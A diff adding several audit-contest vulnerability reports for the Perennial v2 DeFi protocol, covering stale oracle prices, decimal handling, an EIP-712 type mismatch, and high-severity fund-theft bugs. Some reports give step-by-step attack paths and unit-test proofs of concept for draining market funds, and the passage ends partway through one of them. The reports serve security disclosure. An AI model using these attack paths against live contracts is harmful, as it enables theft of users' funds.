validate the oracle's timestamp freshness. If the oracle returns stale data, positions may settle at outdated prices. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L503 the contract does not validate the oracle's timestamp freshness. It might therefore use outdated/stale prices in operations. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Oracles periodically push price data on-chain. If the smart contract does not validate the timestamp of the oracle's latest update, it might use outdated (stale) prices for operations leading to: +1.Inaccurate Operations: Stale prices might not reflect the current market conditions, leading to incorrect collateralization ratios, trade executions, or liquidation thresholds. +2.Economic Losses: Users may lose funds due to improper liquidations or overpayment for swaps caused by stale prices. + +### PoC + +_No response_ + +### Mitigation + +Add checks for oracleVersion.timestamp against a MAX_DELAY. \ No newline at end of file diff --git a/026.md b/026.md new file mode 100644 index 0000000..bc1691a --- /dev/null +++ b/026.md @@ -0,0 +1,39 @@ +Shambolic Mint Dinosaur + +High + +# ERC20 Decimal Handling Risk + +### Summary + +The claimFee function uses UFixed6Lib and UFixed18Lib for token amounts, assuming consistent decimal handling. + +### Root Cause + +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L360 the claimFee function uses UFixed6Lib and UFixed18Lib for token amounts, assuming consistent decimal handling. +In https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L390 +For tokens with decimals ≠ 18 (e.g., USDC with 6 decimals), conversions like UFixed18Lib.from(feeReceived) may miscalculate values. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +Token transfers may fail or lose precision for non-18 decimal tokens. + +### PoC + +_No response_ + +### Mitigation + +Use library methods that explicitly account for token decimals during conversions. \ No newline at end of file diff --git a/027.md b/027.md new file mode 100644 index 0000000..ab7344b --- /dev/null +++ b/027.md @@ -0,0 +1,97 @@ +Fun Pear Mantis + +Medium + +# Inconsistent EIP-712 type hash definition for Fixed6 amount in `Take.sol` and `RelayedTake.sol` will lead to signature verification failures due to nested struct propagation + +### Summary + +Inconsistent type hash definition where Fixed6 amount is defined as int256 in the STRUCT_HASH will cause signature verification failures for users, as the nested struct propagation in RelayedTake compounds the EIP-712 type hash mismatch from the base Take contract. + + + +### Root Cause + +In `Take.sol`, the STRUCT_HASH defines the amount field as `int256` while the actual struct uses `Fixed6`. This type mismatch is then propagated into `RelayedTake.sol` STRUCT_HASH through its nested Take struct definition: + +Take.sol: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Take.sol#L9C1-L22C2 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Take.sol#L28C1-L29C10 + +```solidity +struct Take { + Fixed6 amount; // Uses Fixed6 + address referrer; + Common common; +} + +bytes32 constant public STRUCT_HASH = keccak256( + "Take(int256 amount,address referrer,Common common)" // Defines as int256 + ... +); +``` + +RelayedTake.sol: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/types/RelayedTake.sol#L8C1-L15C2 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/CollateralAccounts/types/RelayedTake.sol#L20C1-L25C7 + +```solidity +struct RelayedTake { + Take take; // Embeds Take struct + Action action; +} + +bytes32 constant public STRUCT_HASH = keccak256( + "RelayedTake(Take take,Action action)" + ... + "Take(int256 amount,address referrer,Common common)" // Propagates incorrect type +); +``` + + +### Internal Pre-conditions + +1. User creates a signed Take message with a Fixed6 amount value +2. The message is processed through either: + - Take contract directly, or + - RelayedTake contract which nests the Take struct + + +### External Pre-conditions + +Not applicable. The vulnerability stems purely from the internal type mismatch between Fixed6 and int256 in the EIP-712 type hash definitions, and how this mismatch propagates through the nested struct implementation between `Take.sol` and `RelayedTake.sol`. + +### Attack Path + +1. User creates a Take with a Fixed6 amount +2. The Fixed6 amount is internally scaled by 1e6 (BASE) as defined in Fixed6Lib +3. When hashing for signature verification: + - In Take: The struct uses Fixed6 (scaled) but STRUCT_HASH expects int256 (unscaled) + - In RelayedTake: The nested Take struct inherits this mismatch, propagating it to the top-level signature verification +4. Signature verification fails in both cases due to type mismatch and value scaling inconsistency + +### Impact + + +Users cannot execute signed Take operations as signature verifications will fail due to the type mismatch between Fixed6 and int256 in the EIP-712 domain separator. This impact is compounded because: + +1. The issue exists in both: + - Base Take contract (direct impact) + - RelayedTake contract (propagated impact through nested struct) +2. All signed messages involving amounts will fail verification regardless of entry point +3. This breaks the intended permissionless nature of the protocol for signed operations +4. The nested struct relationship means fixing the issue requires coordinated updates to maintain consistency across both contracts + +The architectural choice to nest the Take struct in `RelayedTake.sol` while maintaining inconsistent type definitions amplifies the impact of this vulnerability across the protocol's signature verification system. + +### PoC + +_No response_ + +### Mitigation + +_No response_ \ No newline at end of file diff --git a/028.md b/028.md new file mode 100644 index 0000000..966e133 --- /dev/null +++ b/028.md @@ -0,0 +1,167 @@ +Clumsy Pink Otter + +High + +# Anyone can steal all funds from the `market` due to incorrect health accounting for pending pnl from difference of intent price and market price when multiple intents are used. + +### Summary + +When user opens position from signed intent, pending orders are created for 2 accounts (intent taker and maker) with user-specified price. Upon settlement, there is some pnl realized to both accounts due to difference of intent price and market price. The intent price is specified by the user and can be any number within the limits set by the protocols off the latest commited price. The issue is that this pnl is accounted for in account health only for one (current) intent. If there are multiple intents pending for the same account, then all the other intents are ignored and thus attacker can send multiple intents, each of which keeps account healthy, but all of them combined put account into highly negative collateral, which is ignored by health check. This allows attacker to withdraw inflated profit from the other account, stealing all funds from the `market`. + +### Root Cause + +When account health is checked, collateral is adjusted for only current intent (`newGuarantee`) in `InvariantLib.validate`: +https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-panprog/blob/ac46a2fc8baf6c827ee20c69eecae66561a5c65f/perennial-v2/packages/perennial/contracts/types/Guarantee.sol#L71 + +All the other intents (at this, or previous pending orders) are ignored. + +### Internal Pre-conditions + +None. + +### External Pre-conditions + +None. + +### Attack Path + +Since intents can be easily created by any user, there are no pre-conditions for the attack. The scenario is as following: +- Attacker deposits some collateral into `account1` and `account2` (for example, `40`) +- Attacker signs intent with some position (like long `1`) and a price which is much higher than latest oracle price, but inside the protocol's max price deviation limit (say, of `120` when current price is `100`) from `account1` +- Attacker uses `account2` to calls `market.update` with the signed intent from `account1`. This is accepted, as `account1` collateral when checking update invariant is `40 + 1 * (100 - 120) = 40 - 20 = 20` +- The same intent is signed again from `account1` and `account2` submits it again. This is accepted again, as `account1` collateral when checking update invariant is again `40 + 1 * (100 - 120) = 40 - 20 = 20` (it only accounts the 2nd intent, ignoring the 1st intent). However, if this is settled (both intents), the collateral will be `40 + 2 * (100 - 120) = 40 - 40 = 0`. +- The same intent is signed again from `account1` and `account2` submits it again. This is accepted again, as `account1` collateral when checking update invariant is again `40 + 1 * (100 - 120) = 40 - 20 = 20` (it only accounts the 3rd intent, ignoring the 1st and the 2nd intents). However, if this is settled (all 3 intents), the collateral will be `40 + 3 * (100 - 120) = 40 - 60 = -20`. +- This is repeated as many times as necessary (everything in the same epoch, so that all intents are not settled) +- After the settlement, sum of all intents causes `account1` to be in highly negative collateral, while `account2` will be in the same profit. +- Attacker withdraws all funds which `market` has. + +### Impact + +All market collateral token balance is stolen. + +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity + it('multiple intents ignore pnl from the other intents price adjustments', async () => { + const marketParameter = { ...(await market.parameter()) } + marketParameter.maxPriceDeviation = parse6decimal('10.00') + await market.updateParameter(marketParameter) + + const intent = { + amount: parse6decimal('0.3'), + price: parse6decimal('1250'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: owner.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 0, + group: 0, + expiry: 0, + }, + } + + const intent2 = { + amount: parse6decimal('0.3'), + price: parse6decimal('1250'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: owner.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 1, + group: 0, + expiry: 0, + }, + } + + const LOWER_COLLATERAL = parse6decimal('500') + + dsu.transferFrom.whenCalledWith(user.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + LOWER_COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, LOWER_COLLATERAL, false) + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](userC.address, 0, 0, 0, LOWER_COLLATERAL, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + verifier.verifyIntent.returns() + + // solver + factory.authorization + .whenCalledWith(userC.address, userC.address, userC.address, constants.AddressZero) + .returns([true, true, BigNumber.from(0)]) + // taker + factory.authorization + .whenCalledWith(user.address, userC.address, user.address, liquidator.address) + .returns([false, true, parse6decimal('0.20')]) + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent, DEFAULT_SIGNATURE); + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent2, DEFAULT_SIGNATURE); + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); + + var loc = await market.locals(userC.address); + console.log("userC collateral: " + loc.collateral); + var pos = await market.positions(userC.address); + console.log("userC pos: short = " + pos.short); + }) +``` + +Console output: +```solidity +user collateral: -176200000 +user pos: long = 600000 +userC collateral: 1176200000 +userC pos: short = 600000 +``` + +Notice that final userC's collateral is higher than sum of collateral of both users at the start, meaning that attacker has stolen these funds from the market. + +### Mitigation + +Calculate sum of price adjustments for all pending guarantees (from latest + 1 to current), and add it to collateral when validating margined requirement. \ No newline at end of file diff --git a/029.md b/029.md new file mode 100644 index 0000000..ec8c4ba --- /dev/null +++ b/029.md @@ -0,0 +1,54 @@ +Clumsy Pink Otter + +High + +# Some accounts using Intents to trade might be liquidated while healthy or be unliquidatable while being unhealthy. + +### Summary + +When user trades using signed intents, pending order is created using the price specified by the user. Upon settlement, there is some pnl realized due to difference of intent price and market price. The issue is that this difference is added to account only when checking margin to add pending order, but when protection (liquidation) is validated, collateral doesn't include pending intent's pnl from the difference of intent and market price. As such, user can be unfairly liquidated if price moves against him but he has enough collateral (with pnl from pending intent orders). If there is a loss from intent price difference, then this loss is not added when checking liquidation either, thus liquidation will revert as if account is healthy. + +### Root Cause + +When protection is validated, only account's collateral is checked in `InvariantLib.validate`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L127 + +Note that when position is opened, intent price adjustment is added to account's collateral: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L92 + +### Internal Pre-conditions + +- User account is close to liquidation +- Position is opened or closed via Intent with intent price far enough from the latest oracle price (far enough - meaning the difference in price can make account safe) +- Price moves against the user + +### External Pre-conditions + +None. + +### Attack Path + +Happens by itself (unfair user liquidation) or can be crafted by the user (avoid liquidation). +- Margin ratio is 0.5%, maintenence ratio is 0.3% +- Trading fee is 0.1% +- User has `collateral = 350` and settled position of `long = 1000` at the latest oracle price of `100` (account margin ratio is `350 / (1000 * 100) = 0.35%`, very close to liquidation, but still healthy) +- User signs intent to partially close position of the size `500` at the price of `101`. +- The intent is sent on-chain and user now has pending position of `long = 500`. His additional profit from the intent price is `500 * (101 - 100) = 500`. +- Liquidator commits unrequested price of `99.9` +- User's collateral is now `350 + 1000 * (99.9 - 100) = 250`, however since the intent is guaranteed to be executed at the price of `101`, his additional profit from the intent makes the expected margin ratio for liquidation reason = `(250 + 500) / (1000 * 100) = 0.75%`, so account should be safe. +- However, liquidator immediately liquidates user account, because this additional profit from the intent is ignored. +- Besides liquidation fee, upon settlement, user pays fees to close the position from liquidation, which is `500 * 100 * 0.1% = 50`, so the final user collateral is 700 instead of 750. +- User was unfairly liquidated (as his account was healthy) and user has lost `50 / 750 = 6.7%` of his funds. + +### Impact + +- User can be unfairly and unexpectedly liquidated and lose 1%+ of his funds (because this happens only to users with low collateral and the pnl from intent price difference will mostly be small enough, the user loss relative to collateral will be above 1%). + +### Mitigation + +Calculate sum of price adjustments for all pending guarantees (from latest + 1 to current), and add it to collateral when validating if account can be protected (liquidated). + +Additionally, since intent updates are guaranteed and can not be invalidated, consider adding intent position updates to latest position when calculating the account health for liquidation reasons to make more fair liquidations. For example, when position is closed using intent (as in the example in the Attack Path): +- latest = 1000 +- pending (intent) = -500 +Use position of size (1000 - 500 = 500) to calculate health when liquidating, so min collateral should be below 150 instead of 300 to be able to liquidate the account. \ No newline at end of file diff --git a/030.md b/030.md new file mode 100644 index 0000000..e98c98f --- /dev/null +++ b/030.md @@ -0,0 +1,159 @@ +Clumsy Pink Otter + +High + +# `InvariantLib` uses current position for margin check allowing to withdraw collateral while the position decrease is only pending and can cause unexpected immediate user liquidation. + +### Summary + +In normal `update`, the `InvariantLib.validate` uses the `currentPosition` for margin check: +```solidity + if ( + !PositionLib.margined( + updateContext.currentPositionLocal.magnitude(), + context.latestOracleVersion, + context.riskParameter, + updateContext.collateralization, + context.local.collateral.add(newGuarantee.priceAdjustment(context.latestOracleVersion.price)) // apply price override adjustment from intent if present + ) + ) revert IMarket.MarketInsufficientMarginError(); +``` + +However, during liquidation (`protected = true`), `latestPosition` is used for maintenence check: +```solidity + if (context.latestPositionLocal.maintained( + context.latestOracleVersion, + context.riskParameter, + context.local.collateral + )) return false; // latest position is properly maintained +``` + +The latest position is position at the last commited price, while current position is expected position when price is commited for the current epoch (latest + pending). These are 2 totally different values. Usage of `currentPosition` in margined check means that user is allowed to withdraw collateral based on "pending" position (which might still be invalidated). This is wrong by itself, but usage of `latestPosition` in liquidation maintenence check means that normal updates and liquidations are disconnected: perfectly fine normal `update` can easily cause unexpected immediate liquidation after the user withdraws collateral. + +### Root Cause + +Incorrect usage of `currentPosition` in margined check in `InvariantLib.validate`: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L87-L93 + +Additionally, liquidation uses `latestPosition` in maintenence check: +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L124-L128 + +### Internal pre-conditions + +- User reduces position and withdraws collateral, keeping healthy collateral for new (reduced) position. + +### External pre-conditions + +None. + +### Attack Path + +Happens by itself: +- User reduces position (e.g., from 10 to 5) and withdraws collateral, keeping enough to keep new reduced position healthy (e.g. withdrawing half of collateral). +- User account becomes immediately liquidatable and user is liquidated by any liquidator. +- Result: user is unfairly liquidated, losing liquidation and trading fees + +User crafts self-liquidation to steal liquidation fees (can be profitable depending on trading fees and liquidation fee): +- Attacker opens position from account1 +- Awaits settlement +- Attacker then closes full position from account1 and withdraws all collateral (allowed, since `currentPosition == 0`, so 0 collateral needed in margined check) +- Attacker immediately liquidates account1 from account2. +- Result: account1 is in bad debt, account2 earns liquidation fees. + +### Impact + +If user is unfairly liquidated: easily 1%+ funds loss from liquidation. For example: +- Margin ratio is 1.2%, maintenence ratio is 1% +- Trading fee is 0.3% +- Asset price = 1000 +- User has position size = 10, collateral = 200 (margin = 200 / (10*1000) = 2%) +- User reduces position size to 5 (fee = 5000*0.3% = 15), withdraws collateral = 95. Remaining collateral = 90. Margin = 95 / (5 * 1000) = 1.8% +- But the position is immediately liquidated (because maintenence for liquidation purpose = 95 / (10 * 1000) = 0.95%) +- User has position unfairly liquidated and loses fee of 15, so his loss is 15 / 90 = 17% + +If liquidation bonus for liquidator is higher than trading fees from the position, then attacker can repeatedly self-liquidate until all market funds are withdrawn via liquidation fees. + +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('reduced position with collateral withdrawal makes liquidatable position', async () => { + const riskParameter = { ...(await market.riskParameter()) } + const riskParameterTakerFee = { ...riskParameter.takerFee } + riskParameterTakerFee.linearFee = parse6decimal('0.003') + riskParameter.takerFee = riskParameterTakerFee + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + await market.updateRiskParameter(riskParameter) + + const COLLATERAL_USER = parse6decimal('30') + const POSITION_USER = parse6decimal('10') + const POSITION2_USER = parse6decimal('5') + const COLLATERAL2_USER = parse6decimal('15') + + dsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, COLLATERAL_USER.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION_USER, 0, COLLATERAL_USER, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + // position opened. now partially close position and withdraw collateral + dsu.transfer.whenCalledWith(user.address, COLLATERAL2_USER.mul(1e12)).returns(true) + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, POSITION2_USER, 0, -COLLATERAL2_USER, false) + + var loc = await market.locals(user.address); + console.log("user collateral before liquidation: " + loc.collateral); + + // user becomes immediately liquidatable + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, true) + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); +}) +``` + +Console output: +```solidity +user collateral before liquidation: 11310000 +user collateral: 7472950 +user pos: long = 0 +``` + +Demonstrates the user who reduced position from 10 to 5, is liquidated and his collateral reduces from 11.31 to 7.47 (actually, 11.31 doesn't include pending fees, so real collateral after fees is 9.31 before liquidation, 7.47 after unfair liquidation). + +### Mitigation + +1. Do not use currentPosition in margin check. Previously, the marin check had latestPosition + pending.maxPositive, which was correct. With the new system it might make sense to add pending.maxPositive if pending.invalidation == 1, or currentPosition if pending.invalidation == 0 +2. Make sure that liquidation maintenence check matches normal update margin check, so use the same position size for the check. diff --git a/031.md b/031.md new file mode 100644 index 0000000..11f7de6 --- /dev/null +++ b/031.md @@ -0,0 +1,201 @@ +Clumsy Pink Otter + +High + +# Intent orders are guaranteed to execute, but fees from these orders are not accounted in collateral, allowing user to withdraw all collateral ignoring these pending fees. + +### Summary +In normal `update`, all orders are pending and might be invalidated if invalid price is commited for the corresponding epoch (no pricefeed available or price commit timeout). However, when `Intent`s are used, these orders are guaranteed to be accepted (`invalidation = 0` for them). In particular, this feature allows to open and close orders via `Intent`s even when open order epoch is not commited yet. + +The issue is that the fees for the orders are pending and not included in collateral calculations. At the same time, since `Intent` orders are guaranteed, user can open them, close them and withdraw all collateral ignoring any pending fees. Then, after the price for the corresponding epoch is commited, the fees are added to user collateral (which is 0), thus user goes into bad debt. These fees taken are distributed to admin and part of them becomes claimable by the referrer. + +This means that attacker can open, close, withdraw all collateral at 0 cost, and after epoch price is commited, the referrer (also controlled by attacker) can claim part of the fees. Essentially, attacker steals funds from the market via claiming fees which become bad debt of the abandoned account. + +### Root Cause +Trade fees are only applied to account collateral when advancing checkpoints (which happens after the epoch price is commited): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/CheckpointLib.sol#L84-L92 + +At the same time, when all pending orders are guaranteed (from Intents, `invalidation == 0`), user is allowed to fully close the position, even if the opening is still pending (pending negative - which is pending closure - can exceed latest commited position): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L35-L38 + +### Internal pre-conditions +None. + +### External pre-conditions +None. + +### Attack Path +1. Attacker funds account1 and account2 +2. Attacker uses account1 to create 2 Intents to open and then close position with account3 as originator and referral. +3. Attacker uses account2 to execute both intents (to open and then immediately close position) +4. Attacker withdraws all collateral from account1 and account2, getting the same amount he has deposited, because fees are still pending and ignored at this time. +Note: steps 1-4 can be done in 1 transaction, thus attacker can use flash loan to execute the attack +5. Attacker waits until the epoch price is commited +6. Attacker call `market.claimFee(account3)` to get referral fees from the orders. +Result: Attacker can steal all funds from the market. + +### Impact +All market funds are stolen by the Attacker. + +### PoC +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('withdraw fees', async () => { + const riskParameter = { ...(await market.riskParameter()) } + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + await market.updateRiskParameter(riskParameter) + + const marketParameter = { ...(await market.parameter()) } + marketParameter.takerFee = parse6decimal('0.003') + await market.updateParameter(marketParameter) + + factory.parameter.returns({ + maxPendingIds: 5, + protocolFee: parse6decimal('0.50'), + maxFee: parse6decimal('0.01'), + maxLiquidationFee: parse6decimal('1000'), + maxCut: parse6decimal('0.50'), + maxRate: parse6decimal('10.00'), + minMaintenance: parse6decimal('0.01'), + minEfficiency: parse6decimal('0.1'), + referralFee: parse6decimal('0.20'), + minScale: parse6decimal('0.001'), + maxStaleAfter: 14400, + }) + + const intent = { + amount: parse6decimal('0.3'), + price: parse6decimal('123'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: liquidator.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 0, + group: 0, + expiry: 0, + }, + } + + const intent2 = { + amount: -parse6decimal('0.3'), + price: parse6decimal('123'), + fee: parse6decimal('0.5'), + originator: liquidator.address, + solver: liquidator.address, + collateralization: parse6decimal('0.01'), + common: { + account: user.address, + signer: user.address, + domain: market.address, + nonce: 1, + group: 0, + expiry: 0, + }, + } + + const LOWER_COLLATERAL = parse6decimal('500') + + dsu.transferFrom.whenCalledWith(user.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userB.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + dsu.transferFrom.whenCalledWith(userC.address, market.address, LOWER_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(userB) + ['update(address,uint256,uint256,uint256,int256,bool)']( + userB.address, + POSITION, + 0, + 0, + LOWER_COLLATERAL, + false, + ) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, LOWER_COLLATERAL, false) + await market + .connect(userC) + ['update(address,uint256,uint256,uint256,int256,bool)'](userC.address, 0, 0, 0, LOWER_COLLATERAL, false) + + oracle.at.whenCalledWith(ORACLE_VERSION_2.timestamp).returns([ORACLE_VERSION_2, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_3.timestamp).returns([ORACLE_VERSION_3, INITIALIZED_ORACLE_RECEIPT]) + oracle.at.whenCalledWith(ORACLE_VERSION_4.timestamp).returns([ORACLE_VERSION_4, INITIALIZED_ORACLE_RECEIPT]) + oracle.status.returns([ORACLE_VERSION_2, ORACLE_VERSION_3.timestamp]) + + verifier.verifyIntent.returns() + + // solver + factory.authorization + .whenCalledWith(userC.address, userC.address, userC.address, constants.AddressZero) + .returns([true, true, BigNumber.from(0)]) + // taker + factory.authorization + .whenCalledWith(user.address, userC.address, user.address, liquidator.address) + .returns([false, true, parse6decimal('0.20')]) + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent, DEFAULT_SIGNATURE); + + await market + .connect(userC) + [ + 'update(address,(int256,int256,uint256,address,address,uint256,(address,address,address,uint256,uint256,uint256)),bytes)' + ](userC.address, intent2, DEFAULT_SIGNATURE); + + const WITHDRAW_COLLATERAL = parse6decimal('500') + + dsu.transfer.whenCalledWith(user.address, WITHDRAW_COLLATERAL.mul(1e12)).returns(true) + + await market + .connect(user) + ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, -WITHDRAW_COLLATERAL, false) + + oracle.status.returns([ORACLE_VERSION_3, ORACLE_VERSION_4.timestamp]) + + await settle(market, user) + await settle(market, userB) + await settle(market, userC) + + var loc = await market.locals(user.address); + console.log("user collateral: " + loc.collateral); + var pos = await market.positions(user.address); + console.log("user pos: long = " + pos.long); + + var loc = await market.locals(userC.address); + console.log("userC collateral: " + loc.collateral); + var pos = await market.positions(userC.address); + console.log("userC pos: short = " + pos.short); + + var loc = await market.locals(userB.address); + console.log("userB collateral: " + loc.collateral); + + var loc = await market.locals(liquidator.address); + console.log("liquidator claimable: " + loc.claimable); + +}) +``` + +Console output: +```solidity +user collateral: -221400 +user pos: long = 0 +userC collateral: 500000000 +userC pos: short = 0 +userB collateral: 500000000 +liquidator claimable: 44280 +``` + +Demonstrates how Attacker can use 3 accounts to generate claimable fees for free, creating abandoned bad debt account in the process. + +### Mitigation +The issue comes from the fact that position change is guaranteed for Intent orders, but fees are pending until price is commited and are not included in margin/maintenence check calculations. Possible mitigation is to subtract fees pending from the Intent orders (Guarantee) from the collateral in `InvariantLib` when doing margin/maintenence check. \ No newline at end of file diff --git a/032.md b/032.md new file mode 100644 index 0000000..2589544 --- /dev/null +++ b/032.md @@ -0,0 +1,131 @@ +Clumsy Pink Otter + +High + +# When account is liquidated (protected), liquidator can increase account's position to any value up to `2**62 - 1` breaking all market accounting and stealing all market funds. + +### Summary + +Previously, there was a check which enforced position to only decrease during liquidation. However, the check is gone and in the current code only the condition of `pending.negative == latestPosition.magnitude`: +```solidity + if (!context.pendingLocal.neg().eq(context.latestPositionLocal.magnitude())) return false; // no pending zero-cross, liquidate with full close +``` + +If account (before liquidation) is already in this state (for example, user has closed his position fully, but it's still pending - in this case `pendingLocal.neg()` will equal `latestPositionLocal.magnitude()` before the liquidation), then liquidator can increase position, and since it doesn't influence neither latest position nor pending negative (closing), it's allowed. Moreover, all collateral and position size checks are ignored during liquidation, so account position can be increased to any value, including max that can be stored: 2**62 - 1. If this is done, all market accounting is messed up as any slight price change will create huge profit or loss for makers and the liquidated account. This can be abused by attacker to steal all market funds. + +### Root Cause + +Incorrect check when liquidating the account (lack of enforcement to only reduce the position): +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/libs/InvariantLib.sol#L121 + +### Internal pre-conditions + +None. + +### External pre-conditions + +None. + +### Attack Path + +1. Attacker opens tiny long position from account1 with minimal collateral, and tiny maker position from account2. +2. Attacker awaits for the position to become liquidatable. He can also force liquidation himself, as described in another issue (close position and withdraw collateral, then position becomes liquidatable), but this is not necessary, just makes it easier. +3. Just before the position becomes liquidatable, attacker closes it fully (so that it's pending close), making `pending.negative == latestPosition.magnitude` +4. Attacker liquidates his position, increasing it to `2**62 - 1` or any other huge amount. +5. Attacker awaits commited price for the epoch of position increase (or commits himself). +6. Immediately after that, attacker commits any other price different from the previous commit with timestamp 1 second after the previous commit. +7. In the same transaction, attacker withdraws all market collateral either from account1 or account2 (depending on which account ends up in a huge profit due to price change). +Result: Attacker steal all funds from the market. + +### Impact + +All market funds are stolen by the Attacker. + +### PoC + +Add to `test/unit/Market.test.ts` in the `invariant violations` context: +```solidity +it('liquidator increases position', async () => { + const riskParameter = { ...(await market.riskParameter()) } + const riskParameterTakerFee = { ...riskParameter.takerFee } + riskParameterTakerFee.linearFee = parse6decimal('0.003') + riskParameter.takerFee = riskParameterTakerFee + riskParameter.margin = parse6decimal('0.012') + riskParameter.maintenance = parse6decimal('0.01') + riskParameter.minMargin = parse6decimal('5') + riskParameter.minMaintenance = parse6decimal('5') + riskParameter.staleAfter 